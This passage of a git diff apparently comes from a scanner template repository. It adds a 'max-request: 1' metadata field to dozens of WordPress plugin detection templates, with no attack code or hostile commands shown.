+7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 840c086fb9..575c9ebe67 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8e1cb46cf0..8881e23860 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c45ef4bf89..0bc823830f 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index a224d85727..7fbeea5917 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,6 